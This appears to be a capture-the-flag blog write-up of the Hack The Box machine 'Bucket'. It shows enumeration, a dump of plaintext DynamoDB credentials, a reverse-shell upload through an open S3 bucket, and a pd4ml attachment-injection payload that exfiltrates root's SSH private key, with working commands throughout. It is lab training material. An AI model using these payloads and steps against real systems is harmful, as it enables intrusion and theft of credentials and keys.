Posts Bucket
Post
Cancel

Bucket

Machine card

/assets/img/HackTheBox/Bucket/Untitled.png

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
sudo nmap -sS -sC -sV -p- 10.10.10.212

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-30 19:03 CET
Nmap scan report for 10.10.10.212
Host is up (0.020s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.06 seconds

Add the IP to your /etc/hosts

/assets/img/HackTheBox/Bucket/Screenshot_20201101_174538.png

Let’s now check the website on port 80

Website

/assets/img/HackTheBox/Bucket/Screenshot_20201101_174937.png

Nothing interesting at first glance but once you see the source code, we get something interesting about the images that are supposed to be there for each post.

Source code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<article>
<div class="coffee">
<img src="http://s3.bucket.htb/adserver/images/bug.jpg" alt="Bug" height="160" width="160">
</div>
<div class="description">
<h3>Bug Bounty and 0day Research</h3>
<span>march 17, 2020 | Security</span>
<p>Customised bug bounty and new 0day feeds. Feeds can be used on TV, mobile, desktop and web applications. Collecting security feeds from 100+ different trusted sources around the world.</p>
</div>
</article>
<div class="articles">

<article>
<div class="coffee">
<img src="http://s3.bucket.htb/adserver/images/malware.png" alt="Malware" height="160" width="160">
</div>
<div class="description">
<h3>Ransomware Alerts</h3>
<span>march 17, 2020 | Malware</span>
<p>Run awareness ad campaigns on Ransomwares and other newly found malwares. Choose different types of malwares to fit for your campaign</p>
</div>
</article>

<article>
<div class="coffee">
<img src="http://s3.bucket.htb/adserver/images/cloud.png" alt="cheer" height="160" width="160">
</div>
<div class="description">
<h3>Cloud Updates</h3>
<span>march 17, 2020 | Cloud</span>
<p>Stay tuned to cloud technology updates. A superior alternative to Push Notifications and SMS A2P alerts. </p>
</div>
</article>

Add the address to your /etc/hosts and let’s to a little bit of enumeration now

Enumeration

Enumeration on the new link:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
gobuster dir -u http://s3.bucket.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://s3.bucket.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/30 19:12:08 Starting gobuster
===============================================================
/health (Status: 200)
/shell (Status: 200)

Let’s check the shell part of the website.

/assets/img/HackTheBox/Bucket/Screenshot_20201101_175414.png

Gives us access to a JS shell for dynamodb. Tried using it but gave up and in the end used the aws CLI. First let’s get a list of all the tables of the DB:

1
2
3
4
5
6
aws dynamodb list-tables --endpoint-url http://s3.bucket.htb
{
    "TableNames": [
        "users"
    ]
}

Now let’s see what is inside of that table

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb
{
    "Items": [
        {
            "password": {
                "S": "Management@#1@#"
            },
            "username": {
                "S": "Mgmt"
            }
        },
        {
            "password": {
                "S": "Welcome123!"
            },
            "username": {
                "S": "Cloudadm"
            }
        },
        {
            "password": {
                "S": "n2vM-<_K_Q:.Aa2"
            },
            "username": {
                "S": "Sysadm"
            }
        }
    ],
    "Count": 3,
    "ScannedCount": 3,
    "ConsumedCapacity": null
}

No luck connecting with any of the credentials so let’s try something else.

Foothold

Let’s first check if we can create a bucket and upload a file to that bucket

1
2
3
4
aws --endpoint-url=http://s3.bucket.htb s3api create-bucket --bucket mine
aws --endpoint-url=http://s3.bucket.htb s3 ls
2020-11-01 18:40:04 adserver
2020-11-01 18:40:18 mine

As we can see there is two buckets, one that we just created and the other that probably hosts all of the images for the website.

Let’s upload something

1
2
aws --endpoint-url http://s3.bucket.htb s3 cp rev.php s3://mine
upload: ./rev.php to s3://mine/rev.php

Let’s check if the file exists

/assets/img/HackTheBox/Bucket/Screenshot_20201101_184606.png

It does and we can download it. Not what we want but that’s a start.

I got stuck on that for a bit but then I tried to upload my reverse shell to the other bucket adserver

1
2
aws --endpoint-url http://s3.bucket.htb s3 cp rev.php s3://adserver
upload: ./rev.php to s3://adserver/rev.php

Now let’s start a nc listener and check on that file

/assets/img/HackTheBox/Bucket/Screenshot_20201101_185439.png

We got our foothold now let’s get user on the machine

Getting user

Let’s first look at who is on the machine:

1
2
3
www-data@bucket:/$ ls /home
ls /home
roy

We only have one user. Now I just tried for good measure the passwords that we got from the table one by one and got lucky

Roy’s password is: n2vM-<_K_Q:.Aa2. Connect to the server using ssh and you get the user flag

1
2
3
4
roy@bucket:~$ ls
project  user.txt
roy@bucket:~$ cat user.txt
a7.........................32

Privilege Escalation

Source Code

After some enumeration inside of the server, you come accross the source code of index.php for the website:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
if($_SERVER["REQUEST_METHOD"]==="POST") {
        if($_POST["action"]==="get_alerts") {
                date_default_timezone_set('America/New_York');
                $client = new DynamoDbClient([
                        'profile' => 'default',
                        'region'  => 'us-east-1',
                        'version' => 'latest',
                        'endpoint' => 'http://localhost:4566'
                ]);

                $iterator = $client->getIterator('Scan', array(
                        'TableName' => 'alerts',
                        'FilterExpression' => "title = :title",
                        'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
                ));

                foreach ($iterator as $item) {
                        $name=rand(1,10000).'.html';
                        file_put_contents('files/'.$name,$item["data"]);
                }
                passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
        }
}
else
{
?>

Here we see that it uses pd4ml to generate a PDF file with any item in the table alerts and the title Ransomware. After going through the documentation, I got this interesting part for attachments in pdf files: https://pd4ml.com/cookbook/pdf-attachments.htm

Looking at the last example, it looks like when can add inline file to the attachment.

So now we need to do 3 thing:

  • Create the alert table
  • add our payload as an item within that table
  • get it to generate the pdf file with a POST request

NB: ****you can recover the flag using this method but also the id_rs to connect via SSH which I will show down here

From you own machine, reate the table with the following command:

1
aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url=http://s3.bucket.htb

Create an item with our payload

1
aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/.ssh/id_rsa</pd4ml:attachment>"}}' --endpoint-url=http://s3.bucket.htb

On the bucket machine create the POST request

1
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v

If it looks like it took some time before getting an answer, that means you have created the pdf file and you can copy it onto your machine:

1
scp roy@bucket.htb:/var/www/bucket-app/files/result.pdf ~/Github/CTFstuff/HackTheBox/machines/Buckets/

download the file in the pdf (click on the icon):

/assets/img/HackTheBox/Bucket/Screenshot_20201101_201642.png

change the permission and connect with ssh

1
2
3
4
5
6
chmod 600 id_rsa
ssh -i id_rsa root@bucket.htb
root@bucket:~# ls
backups  docker-compose.yml  files  restore.php  restore.sh  root.txt  snap  start.sh  sync.sh
root@bucket:~# cat root.txt
9fca4..................................202079ce3

WE GOT THE FLAG!!!!

This post is licensed under CC BY 4.0 by the author.